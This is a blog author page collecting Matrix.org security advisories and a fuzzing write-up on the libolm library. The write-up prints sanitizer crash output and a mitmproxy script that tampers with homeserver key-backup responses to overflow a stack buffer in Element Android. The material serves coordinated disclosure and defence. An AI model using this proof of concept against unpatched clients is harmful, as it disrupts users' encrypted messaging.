Denis Kasak

7 posts tagged with "Denis Kasak" (See all authors)

Disclosing Synapse security advisories

2023-05-24 — Security — Denis Kasak
Last update: 2023-05-24 13:36

Today we are retroactively publishing advisories for security bugs in Synapse. From oldest to most recent, they are:

GHSA-p9qp-c452-f9r7 (CVE-2022-39374), fixed in Synapse 1.68.0 and affecting all prior versions since Synapse 1.62.0;
GHSA-45cj-f97f-ggwv (CVE-2022-39335), fixed in Synapse 1.69.0 and affecting all prior versions; and finally
GHSA-f3wc-3vxv-xmvr (CVE-2023-32323), fixed in Synapse 1.74.0 and affecting all prior versions.

We strongly advise Synapse operators who are still on earlier Synapse versions to upgrade to the latest version (v1.84.0) or at the very least v1.74.0 (released Dec 2022), to prevent attacks based on these vulnerabilities. Please see the advisories for the full details, including a description of

the vulnerability and potential attacks,
exactly which deployments are vulnerable, and
workarounds and mitigations.

Because these bugs are either related to or exploitable over Matrix federation, we have delayed publishing these advisories until now out of caution. This allowed us to ensure that the majority of Synapse homeservers across the public federation have upgraded to a sufficiently patched version, based on the (opt-in) stats reporting to the Matrix.org foundation.

If you have any questions or comments about this announcement or any of the advisories, e-mail us at security@matrix.org.

Security releases: matrix-js-sdk 24.0.0 and matrix-react-sdk 3.69.0

2023-03-28 — Releases, Security — Denis Kasak

Today we are issuing security releases of matrix-js-sdk and matrix-react-sdk to patch a pair of High severity vulnerabilities (CVE-2023-28427 / GHSA-mwq8-fjpf-c2gr for matrix-js-sdk and CVE-2023-28103 / GHSA-6g43-88cp-w5gv for matrix-react-sdk).

Affected clients include those which depend on the affected libraries, such as Element Web/Desktop and Cinny. Releases of the affected clients should follow shortly. We advise users of those clients to upgrade at their earliest convenience.

The issues involve prototype pollution via events containing special strings in key locations, which can temporarily disrupt normal functioning of matrix-js-sdk and matrix-react-sdk, potentially impacting the consumer's ability to process data safely.

Although we have only demonstrated a denial-of-service-style impact, we cannot completely rule out the possibility of a more severe impact due to the relatively extensive attack surface. We have therefore classified this as High severity and strongly recommend upgrading as a precautionary measure.

We found these issues during a codebase audit that we had previously announced in an earlier security release of matrix-js-sdk and matrix-react-sdk. The earlier release had already addressed a set of similar vulnerabilities that were assigned CVE-2022-36059 / GHSA-rfv9-x7hh-xc32 and CVE-2022-36060 / GHSA-2x9c-qwgf-94xr, which we had initially decided not to disclose until the completion of the audit. Now that the audit is finished, we are disclosing those previous advisories as well.

Upgrade now to address E2EE vulnerabilities in matrix-js-sdk, matrix-ios-sdk and matrix-android-sdk2

2022-09-28 — Security — Matthew Hodgson, Denis Kasak, Matrix Cryptography Team, Matrix Security Team

TL;DR:

Two critical severity vulnerabilities in end-to-end encryption were found in the SDKs which power Element, Beeper, Cinny, SchildiChat, Circuli, Synod.im and any other clients based on matrix-js-sdk, matrix-ios-sdk or matrix-android-sdk2.
These have now been fixed, and we have not seen evidence of them being exploited in the wild. All of the critical vulnerabilities require cooperation from a malicious homeserver to be exploited.
Please upgrade immediately in order to be protected against these vulnerabilities.
Clients with other encryption implementations (including Hydrogen, ElementX, Nheko, FluffyChat, Syphon, Timmy, Gomuks and Pantalaimon) are not affected; this is not a protocol bug.
We take the security of our end-to-end encryption extremely seriously, and we have an ongoing series of public independent audits booked to help guard against future vulnerabilities. We will also be making some protocol changes in the future to provide additional layers of protection.
This resolves the pre-disclosure issued on September 23rd.

Security release of matrix-appservice-irc 0.35.0 (High severity)

2022-09-13 — Releases, Security — Denis Kasak

We've released a new version of matrix.org's node-irc 1.3.0 and matrix-appservice-irc 0.35.0, to patch several security issues:

IRC mode operator confusion (Low, GHSA-cq7q-5c67-w39w)
Parsing issue leading to room takeovers (High, GHSA-xvqg-mv25-rwvw)
Undisclosed issue (Moderate, GHSA-r3p6-cg2c-c4qw)

The details of the final vulnerability will be released at a later date, pending an audit of the codebase to ensure it's not affected by other similar vulnerabilities.

The vulnerabilities have been patched in node-irc version 1.3.0 and matrix-appservice-irc 0.35.0. You can get the release on Github.

The bridges running on the Libera Chat, OFTC and other networks bridged by the Matrix.org Foundation have been patched.

Please upgrade your IRC bridge as soon as possible.

The above vulnerabilities were reported by Val Lorentz. Thank you!

Security releases: matrix-js-sdk 19.4.0 and matrix-react-sdk 3.53.0

2022-08-31 — Releases, Security — Denis Kasak

Today we are issuing security releases of matrix-js-sdk and matrix-react-sdk to patch a couple of High severity vulnerabilities (reserved as CVE-2022-36059 for the matrix-js-sdk and CVE-2022-36060 for the matrix-react-sdk).

Affected clients include those which depend on the affected libraries, such as Element Web/Desktop and Cinny. Releases of the affected clients will follow shortly. We advise users of those clients to upgrade at their earliest convenience.

The vulnerabilities give an adversary who you share a room with the ability to carry out a denial-of-service attack against the affected clients, making it not show all of a user's rooms or spaces and/or causing minor temporary corruption.

The full vulnerability details will be disclosed at a later date, to give people time to upgrade and us to perform a more thorough audit of the codebase.

Note that while the vulnerability was to our knowledge never exploited maliciously, some unintentional public testing has left some people affected by the bug. We made a best effort to sanitize this to stop the breakage. If you are affected, you may still need to clear the cache and reload your Matrix client for it to take effect.

We thank Val Lorentz who discovered and reported the vulnerability over the weekend.

Disclosing CVE-2021-40823 and CVE-2021-40824: E2EE vulnerability in multiple Matrix clients

2021-09-13 — Security — Denis Kasak, Dan Callahan, Matthew Hodgson

Today we are disclosing a critical security issue affecting multiple Matrix clients and libraries including Element (Web/Desktop/Android), FluffyChat, Nheko, Cinny, and SchildiChat. Element on iOS is not affected.

Specifically, in certain circumstances it may be possible to trick vulnerable clients into disclosing encryption keys for messages previously sent by that client to user accounts later compromised by an attacker.

Exploiting this vulnerability to read encrypted messages requires gaining control over the recipient’s account. This requires either compromising their credentials directly or compromising their homeserver.

Thus, the greatest risk is to users who are in encrypted rooms containing malicious servers. Admins of malicious servers could attempt to impersonate their users' devices in order to spy on messages sent by vulnerable clients in that room.

This is not a vulnerability in the Matrix or Olm/Megolm protocols, nor the libolm implementation. It is an implementation bug in certain Matrix clients and SDKs which support end-to-end encryption (“E2EE”).

We have no evidence of the vulnerability being exploited in the wild.

This issue was discovered during an internal audit by Denis Kasak, a security researcher at Element.

🔗Remediation and Detection

Patched versions of affected clients are available now; please upgrade as soon as possible — we apologise sincerely for the inconvenience. If you are unable to upgrade, consider keeping vulnerable clients offline until you can. If vulnerable clients are offline, they cannot be tricked into disclosing keys. They may safely return online once updated.

Unfortunately, it is difficult or impossible to retroactively identify instances of this attack with standard logging levels present on both clients and servers. However, as the attack requires account compromise, homeserver administrators may wish to review their authentication logs for any indications of inappropriate access.

Similarly, users should review the list of devices connected to their account with an eye toward missing, untrusted, or non-functioning devices. Because an attacker must impersonate an existing or historical device, exploiting this vulnerability would either break an existing login on the user’s account, or a historical device would be re-added and flagged as untrusted.

Lastly, if you have previously verified the users / devices in a room, you would witness the safety shield on the room turn red during the attack, indicating the presence of an untrusted and potentially malicious device.

🔗Affected Software

Given the severity of this issue, Element attempted to review all known encryption-capable Matrix clients and libraries so that patches could be prepared prior to public disclosure.

Known vulnerable software:

matrix-js-sdk < 12.4.1 (CVE-2021-40823), including:
- Element Web / Desktop < 1.8.3
- SchildiChat (Web / Desktop) ≤ 1.7.32-sc1
- Cinny < 1.2.1
matrix-android-sdk2 < 1.2.2 (CVE-2021-40824), including:
- Element (Android) < 1.2.2
- SchildiChat (Android) < 1.2.2.sc43
matrix-rust-sdk < 0.4.0:
- fractal-next is not vulnerable due to depending on a recent enough commit.
- weechat-matrix-rs, a rewrite of the original weechat-matrix script, had no tagged releases, but some commits did depend on vulnerable versions of the matrix-rust-sdk. Users should ensure to update to the latest master of weechat-matrix-rs, presently 2b093a7.
FamedlySDK < 0.5.0, including:
- Famedly < 0.45.0
- FluffyChat < 0.40.0
Nheko ≤ 0.8.2

We believe the following software is not vulnerable:

matrix-android-sdk (deprecated!)
matrix-ios-sdk
matrix-nio, including its use in Pantalaimon and weechat-matrix.

We believe the following are not vulnerable due to not implementing key sharing:

Chatty
Hydrogen
mautrix
purple-matrix
Syphon

🔗Background

Matrix supports the concept of “key sharing”, letting a Matrix client which lacks the keys to decrypt a message request those keys from that user's other devices or the original sender's device.

This was a feature added in 2016 in order to address edge cases where a newly logged-in device might not have the necessary keys to decrypt historical messages. Specifically, if other devices in the room are unaware of the new device due to a network partition, they have no way to encrypt for it—meaning that the only way the new device will be able to decrypt history is if the recipient's other devices share the necessary keys with it.

Other situations where key sharing is desirable include when the recipient hasn't backed up their keys (either online or offline) and needs them to decrypt history on a new login, or when facing implementation bugs which prevent clients from sending keys correctly. Requesting keys from a user's other devices sidesteps these issues.

Key sharing is described here in the Matrix E2EE Implementation Guide, which contains the following paragraph:

In order to securely implement key sharing, clients must not reply to every key request they receive. The recommended strategy is to share the keys automatically only to verified devices of the same user.

This is the approach taken in the original implementation in matrix-js-sdk, as used in Element Web and others, with the extension of also letting the sending device service keyshare requests from recipient devices. Unfortunately, the implementation did not sufficiently verify the identity of the device requesting the keyshare, meaning that a compromised account can impersonate the device requesting the keys, creating this vulnerability.

This is not a protocol or specification bug, but an implementation bug which was then unfortunately replicated in other independent implementations.

While we believe we have identified and contacted all affected E2EE client implementations: if your client implements key sharing requests, we strongly recommend you check that you cryptographically verify the identity of the device which originated the key sharing request.

🔗Next Steps

The fact that this vulnerability was independently introduced so many times is a clear signal that the current wording in the Matrix Spec and the E2EE Implementation Guide is insufficient. We will thoroughly review the related documentation and revise it with clear guidelines on safely implementing key sharing.

Going further, we will also consider whether key sharing is still a necessary part of the Matrix protocol. If it is not, we will remove it. As discussed above, key sharing was originally introduced to make E2EE more reliable while we were ironing out its many edge cases and failure modes. Meanwhile, implementations have become much more robust, to the point that we may be able to go without key sharing completely. We will also consider changing how we present situations in which you cannot decrypt messages because the original sender was not aware of your presence. For example, undecryptable messages could be filed in a separate conversation thread, or those messages could require that keys are shared manually, effectively turning a bug into a feature.

We will also accelerate our work on matrix-rust-sdk as a portable reference implementation of the Matrix protocol, avoiding the implicit requirement that each independent library must necessarily reimplement this logic on its own. This will have the effect of reducing attack surface and simplifying audits for software which chooses to use matrix-rust-sdk.

Finally, we apologise to the wider Matrix community for the inconvenience and disruption of this issue. While Element discovered this vulnerability during an internal audit of E2EE implementations, we will be funding an independent end-to-end audit of the reference Matrix E2EE implementations (not just Olm + libolm) in the near future to help mitigate the risk from any future vulnerabilities. The results of this audit will be made publicly available.

🔗Timeline

Ultimately, Element took two weeks from initial discovery to completing an audit of all known, public E2EE implementations. It took a further week to coordinate disclosure, culminating in today's announcement.

Monday, 23rd August — Discovery that Element Web is exploitable.
Thursday, 26th August — Determination that Element Android is exploitable with a modified attack.
Wednesday, 1 September — Determination that Element iOS fails safe in the presence of device changes.
Friday, 3 September — Determination that FluffyChat and Nheko are exploitable.
Tuesday, 7th September — Audit of Matrix clients and libraries complete.
Wednesday, 8th September — Affected software authors contacted, disclosure timelines agreed.
Friday, 10th September — Public pre-disclosure notification. Downstream packagers (e.g., Linux distributions) notified via Matrix and e-mail.
Monday, 13th September — Coordinated releases of all affected software, public disclosure.

Adventures in fuzzing libolm

2021-06-14 — Research, Security — Denis Kasak

🔗Introduction

Hi all! My name is Denis and I'm a security researcher. Six months ago, I started working for Element on doing dedicated security research on important Matrix projects. After some initial focus on Synapse, I decided to take a closer look at libolm. In this entry, I'd like to present an overview of that work, along with some early fruits that came out of it.

TL;DR: we found some bugs which had crept in since libolm's original audit in 2016, thanks to properly overhauling our fuzzing capability, and we'd like to tell you all about it! The bugs were not easily exploitable (if at all), and have already been fixed.

Update: CVE-2021-34813 has now been assigned to this.

To give a bit of a background, libolm is a cryptographic library implementing the Double Ratchet Algorithm pioneered by Signal and it is the cryptographic workhorse behind Matrix. The classic algorithm is called Olm in Matrix land, but libolm also implements Megolm which is a variant for efficient encrypted group chats between many participants.

Since libolm is currently used in all Matrix clients supporting end-to-end encryption, it makes for a particularly juicy target. The present state of libolm's monopoly on Matrix encryption is somewhat unfortunate -- luckily there are some exciting new developments on the horizon, such as the vodozemac implementation in Rust. But for now, we're stuck with libolm.

To start, I decided to do a bit of fuzzing. libolm already had a fuzzing setup using AFL, but it was written a while ago. The state of the art in fuzzing had advanced quite rapidly in the last few years, so the setup was missing many modern features and techniques. As an example, the fuzzing setup was configured to use the now ancient afl-gcc coverage mode, which can be slower than the more modern LLVM-based coverage by a factor of 2.

I also noticed that the fuzzing was done with non-hardened binaries (instead of using something like ASAN), so many memory errors could've gone unnoticed. There were also no corpora available from previous fuzzing runs and some of the newer code was not covered by the harnesses.

🔗Preparation

I decided to tackle these one by one, adding ASAN and MSAN builds as a first step. I took the opportunity to switch to AFL++ since it is a drop-in replacement and contains numerous improvements, notably improved coverage modes which are either much faster (e.g. LLVM-PCGUARD) or guaranteed to have no collisions (LTO)¹. AFL++ also optimizes mutation scheduling (by using scheduling algorithms from AFLFast) and mutation operator selection (through MOpt). All of this makes it much more efficient at discovering bugs.

After this, I changed the existing harnesses to use AFL's persistent mode (which lowers process creation overhead and thus increases fuzzing performance). This change, combined with the switch to a newer coverage mode, increased the fuzzing exec/s from ~2.5k to ~5.5k on my machine, so this is not an insignificant gain!

In the context of fuzzing, collisions are situations where two different execution paths appear to the fuzzer as the same one due to technical limitations. Classically, AFL tracks coverage by tracking so-called "edges" (or "tuples"). Edges are really pairs of (A, B), where A and B represent basic blocks. Each edge is meant to represent a different execution "jump", but sometimes, as the number of basic blocks in a program grows, two different execution paths can end up being encoded as the same edge. LTO mode in AFL++ does some magic so that this is guaranteed not to happen.

After this preparatory work, I generated a small initial corpus and ran a small fleet of fuzzers with varying parameters. Almost immediately, I started getting heaps of crashes. Luckily, after some investigation, these turned out not to be serious bugs in the library but a double-free in the fuzzing harness! The double-free only got triggered when the input was of size 0. It also only happened with AFL++ and not vanilla AFL, presumably due to differences in input trimming logic, which must be the reason no one noticed this earlier. I quickly came up with a patch and resumed.

🔗The plot thickens

I let the fuzzers run for a while. Since ASAN introduces a bit of a performance overhead, I only run a single AFL instance with ASAN variant of the binary. This is okay because all fuzzer instances actually synchronize their findings, which means every instance gets to see every input which increases coverage. When I came back to check, there was another crash waiting. This time the crashing input wasn't being generated continually so it looked much more promising -- and only the ASAN instance was crashing. A-ha!

Running the offending input on the ASAN variant of the harness revealed it was an invalid read one byte past the end of a heap buffer. The read was happening in the base64 decoder:

❮ ./build/fuzzers/fuzz_group_decrypt_asan "" pickled-inbound-group-session.txt <input
=================================================================
==1838065==ERROR: AddressSanitizer: heap-buffer-overflow on address 0xf4a00795 at pc 0x56560660 bp 0xffff9df8 sp 0xffff9de8
READ of size 1 at 0xf4a00795 thread T0
    #0 0x5656065f in olm::decode_base64(unsigned char const*, unsigned int, unsigned char*) src/base64.cpp:124
    #1 0x565607b5 in _olm_decode_base64 src/base64.cpp:165
    #2 0x565d5a9e in olm_group_decrypt_max_plaintext_length src/inbound_group_session.c:304
    #3 0x56558e75 in main fuzzers/fuzz_group_decrypt.cpp:46
    #4 0xf7509a0c in __libc_start_main (/usr/lib32/libc.so.6+0x1ea0c)
    #5 0x5655a0f4 in _start (/home/dkasak/code/olm/build/fuzzers/fuzz_group_decrypt_asan+0x50f4)

0xf4a00795 is located 0 bytes to the right of 5-byte region [0xf4a00790,0xf4a00795)
allocated by thread T0 here:
    #0 0xf7a985c5 in __interceptor_malloc /build/gcc/src/gcc/libsanitizer/asan/asan_malloc_linux.cpp:145
    #1 0x56558ce3 in main fuzzers/fuzz_group_decrypt.cpp:32
    #2 0xf7509a0c in __libc_start_main (/usr/lib32/libc.so.6+0x1ea0c)

SUMMARY: AddressSanitizer: heap-buffer-overflow src/base64.cpp:124 in olm::decode_base64(unsigned char const*, unsigned int, unsigned char*)
Shadow bytes around the buggy address:
  0x3e9400a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x3e9400b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x3e9400c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x3e9400d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x3e9400e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x3e9400f0: fa fa[05]fa fa fa 05 fa fa fa fa fa fa fa fa fa
  0x3e940100: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x3e940110: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x3e940120: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x3e940130: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x3e940140: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07 
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==1838065==ABORTING

Following the stack trace, I quickly pinpointed the root of the bug: the logic of the decoder was subtly flawed, unconditionally accessing a remainder byte² in the base64 input which might not actually be there. This occurs when the input is 1 (mod 4) in length, which can never happen in a valid base64 payload, but of course we cannot assume all inputs are necessarily valid payloads. Specifically, if the payload was not 0 (mod 4) in length, the code was assuming it was at least 2 (mod 4) or more in length and immediately read the second byte. This spurious byte was then incorporated into the output value.

By remainder byte, I mean bytes which are not part of a group of 4. These can only occur at the end of a base64 payload and they're the ones that get suffixed with padding in padded base64.

I examined the code in an attempt to find a way to have it leak more than a single byte, but it was impossible. As it turned out, not even the full byte of useful information was encoded into the output -- due to the way the byte is encoded, only about 6 bits of useful information ended up in the output value.

Still, even a single leaked bit is too much in a cryptographic context. Could we do some heap hacking so that something of interest is placed there and then have it be leaked to us?

I next tracked down all call sites of the vulnerable function olm::decode_base64. Most of them were immune to the problem since they were preceded with calls to another function, olm::decode_base64_length, which checks that the base64 payload is of legal length. This left me with only a few potentially vulnerable call sites, so I examined where their base64 inputs come from. Promisingly, two of them received input from other conversation participants, but they either had no way of leaking the information back to the attacker or they hardcoded the number of bytes to be processed, after ensuring the input was of some minimum length. The output of the remaining function olm_pk_decrypt is never sent anywhere externally, so there was again no way of leaking the data to the attacker.

In conclusion, even though this invalid read is a valid bug, I was not able to find a working exploit for it.

But wait a second! Something was still bothering me about olm_pk_decrypt. It's a fairly complex function, receives several string inputs from the homeserver and it itself isn't tested by any of the harnesses. Furthermore, the reason I started looking at it in the first place is that it was missing the olm::decode_base64_length check. Perhaps it warrants a closer look?

🔗It does

And sure enough, there was something amiss. As olm_pk_decrypt receives three base64 inputs from the homeserver: the ciphertext to decrypt, an ephemeral public key and a MAC. All three are eventually passed to olm::decode_base64 to be decoded. Yet there was only a single length check there, to ensure the decrypted ciphertext would fit its output buffer. What would happen if the server returned a public key that was longer than expected?

struct _olm_curve25519_public_key ephemeral;
olm::decode_base64(
    (const uint8_t*)ephemeral_key, ephemeral_key_length,
    (uint8_t *)ephemeral.public_key
);

As can be seen from the snippet, the decoded version of public key gets written to ephemeral.public_key, which is an array allocated on the stack. If the input is longer than expected, this will become a stack buffer overflow.

The purpose of olm_pk_decrypt is to decrypt secrets previously stored by a Matrix device on the homeserver. The point of encryption is to prevent the server from learning these secrets since they're supposed to be known only by your own devices. One use case for this mechanism is to allow one of your devices to store encrypted end-to-end encryption keys on the homeserver. Your other devices can then retrieve those keys from the homeserver, making it possible to view all of your private conversations on each of your devices.

I decided to go for an end-to-end test to confirm the bug is triggerable by connecting with the latest Element Android from my test phone to my homeserver, with mitmproxy sitting in between. This allowed me to write a small mitmproxy script which intercepts HTTP calls fetching the E2E encryption keys from the homeserver and modifies the response so that the key is longer than expected.

import json

from mitmproxy import ctx, http


def response(flow: http.HTTPFlow) -> None:
    if ("/_matrix/client/unstable/room_keys/keys" in flow.request.pretty_url
            and flow.request.method == "GET"):

        response_body = flow.response.content.decode("utf-8")
        response_json = json.loads(response_body)

        rooms = response_json["rooms"]
        room_id = list(rooms.keys())[0]

        sessions = rooms[room_id]["sessions"]
        session = list(sessions.keys())[0]
        session_data = sessions[session]["session_data"]

        ephemeral = session_data["ephemeral"]
        ctx.log.info(f"Replacing ephemeral key '{ephemeral}' with '{ephemeral * 10}'")
        session_data["ephemeral"] = ephemeral * 10

        modified_body = json.dumps(response_json).encode("utf-8")
        flow.response.content = modified_body

This longer value is then eventually passed by Element Android to libolm's olm_pk_decrypt, which triggers the buffer overflow. With all of that in place, I deleted the local encryption key backup on my device and asked for it to be restored from the server:

F libc    : stack corruption detected (-fstack-protector)
F libc    : Fatal signal 6 (SIGABRT), code -6 (SI_TKILL) in tid 24517 (DefaultDispatch), pid 24459 (im.vector.app)
F DEBUG   : *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***
F DEBUG   : Build fingerprint: 'xiaomi/tissot/tissot_sprout:9/PKQ1.180917.001/V10.0.24.0.PDHMIXM:user/release-keys'
F DEBUG   : Revision: '0'
F DEBUG   : ABI: 'arm64'
F DEBUG   : pid: 24459, tid: 24517, name: DefaultDispatch  >>> im.vector.app <<<
F DEBUG   : signal 6 (SIGABRT), code -6 (SI_TKILL), fault addr --------
F DEBUG   : Abort message: 'stack corruption detected (-fstack-protector)'
F DEBUG   :     x0  0000000000000000  x1  0000000000005fc5  x2  0000000000000006  x3  0000000000000008
F DEBUG   :     x4  0000000000000000  x5  0000000000000000  x6  0000000000000000  x7  0000000000000030
F DEBUG   :     x8  0000000000000083  x9  7d545b4513138652  x10 0000000000000000  x11 fffffffc7ffffbdf
F DEBUG   :     x12 0000000000000001  x13 0000000060b0f2a9  x14 0022ed916fede200  x15 0000d925cd93f18f
F DEBUG   :     x16 00000079e741b2b0  x17 00000079e733c9d8  x18 0000000000000000  x19 0000000000005f8b
F DEBUG   :     x20 0000000000005fc5  x21 0000007940e3c400  x22 000000000000026b  x23 00000000000001d0
F DEBUG   :     x24 000000000000002f  x25 000000793d9653f0  x26 0000007948303368  x27 0000007945dd5588
F DEBUG   :     x28 00000000000001d0  x29 0000007945dd37d0
F DEBUG   :     sp  0000007945dd3790  lr  00000079e732e00c  pc  00000079e732e034

🔗Impact

This vulnerability is a server-controlled stack buffer overflow in Matrix clients supporting room key backup.

Of course, the largest fear stemming from any remotely controlled stack buffer overflow is code execution. This is perhaps even doubly so in a cryptographic library, where we have the additional worry of an attacker being able to leak our dearly protected conversations.

The federated architecture of Matrix may be somewhat of a mitigating circumstance in this case, since users are much more likely to know and trust the homeserver owner, but we don't want to have to rely on this trust.

🔗Native binaries

Luckily, on its own, this bug is not enough to successfully execute code on native binaries. By default, libolm is compiled for all supported targets with stack canaries (also called stack protectors or stack cookies), which are magic values unknown to the attacker, placed just before the current function's frame on the stack. This value is checked upon returning from the function -- if its value is changed, the process aborts itself to prevent further damage. This is evident from the Abort message: 'stack corruption detected (-fstack-protector)' message above. Besides canaries, other system-level protections exist to make exploiting bugs such as this harder, such as ASLR.

Therefore, to achieve remote code execution, an attacker would need to find additional vulnerabilities which would allow him to exfiltrate the stack canary and addresses of key memory locations from the system.

🔗WASM

With WASM, the analysis is much more complicated due to its very different memory and execution model. In WASM, the unmanaged stack is generally much more vulnerable due to it missing support for stack canaries. This implies a stack buffer overflow can not only overwrite the frame of the function in which the overflow occurred but also all parent frames.

On the other hand, due to typed calls and much stronger control-flow integrity techniques, it's much harder for the attacker to make the code do something that is (maliciously) useful. Notably, return addresses live outside unmanaged memory and are out of reach to the attacker. Because of this, the primary way of influencing code execution is by manipulating call_indirect instructions in such a way as to call.

The analysis of the impact of this bug on the WASM binary is thus left as an exercise to the reader. If you're interested, the 2020 USENIX paper Everything Old is New Again: Binary Security of WebAssembly is a great starting point.

🔗The fix

Once the problems were identified, the patches were rather trivial and the issues were promptly resolved. The first libolm release that includes the fix is 3.2.3 which was released on 2021-05-25.

We reached out to all Matrix clients which were determined to be affected. The Element client versions which first fix the issue are as follows:

Element Web/Desktop: v1.7.29
Element Android: v1.1.9
Element iOS: v1.4.0

For the mobile clients, these versions are already available in their respective application stores at the time of publishing this post. If you haven't already, please upgrade.

🔗Future work

Even though the fuzzing setup is in a much better shape now (or rather will be, since I still have some PRs to merge upstream), there's still a lot that can be done to further improve it.

Right now, there are undoubtedly parts of the codebase that are not fuzzed well. The reasons for this range from the obvious, like some parts of the code simply not being called by any the existing harnesses, to more subtle ones such as the fact that cryptographic operations form a nearly-insurmountable natural barrier for naive fuzzing operations³. Finally, some of the existing harnesses accept additional parameters as command-line arguments, meaning we would have to re-run the same harness with different values of those parameters in order to reach full coverage of the code. This is suboptimal.

So the plan for future work is roughly as follows:

Write missing harnesses to cover more portions of the codebase.
Write starting corpus generators. These should generate believable, valid input for each of the harnesses. For example, for the decryption harness, we should generate a variety of encrypted messages: empty, short, long, text, binary, etc.
Modify the harnesses so that their extra parameters are determined from the fuzzed input. This will allow the fuzzer to vary these itself, which reduces the importance of the human in the loop and makes it harder to forget some combination.
Fuzz for some time until coverage stops increasing. The corpora generated should be saved so that future fuzzing attempts can resume from an earlier point so that this work is not wasted.
Use afl-cov to investigate which parts of the code are not covered well or at all. This should inform us what further changes are needed.
Write intelligent, custom mutators. These will allow the fuzzer to take a valid input and easily produce another valid input instead of only corrupting it with a high probability.
Design harnesses which test for wanted semantic properties instead of only memory errors.

Classic fuzzers famously have a hard time circumventing magic values and checksums, and cryptography is full of these. This is further complicated by the fact that the double ratchet algorithm is very stateful and depends on the two ratchets evolving in lockstep. This means that even if, for example, the decryption harness is supplied with a corpus of valid encrypted messages, the mutations done by the fuzzer would only manage to produce corrupted versions of those messages which will fail to decrypt, but it will ~never manage to produce a different valid encrypted message.

It's very exciting that we're able to do full-time security research on Matrix these days (thanks to Element's funding), and going forwards we'll publish any interesting discoveries for the visibility and education of the whole Matrix community. We'd also like to remind everyone that we run an official Security Disclosure Policy for Matrix.org and we'd welcome other researchers to come join our Hall of Fame! (And hopefully we will get more bounty programmes running in future.)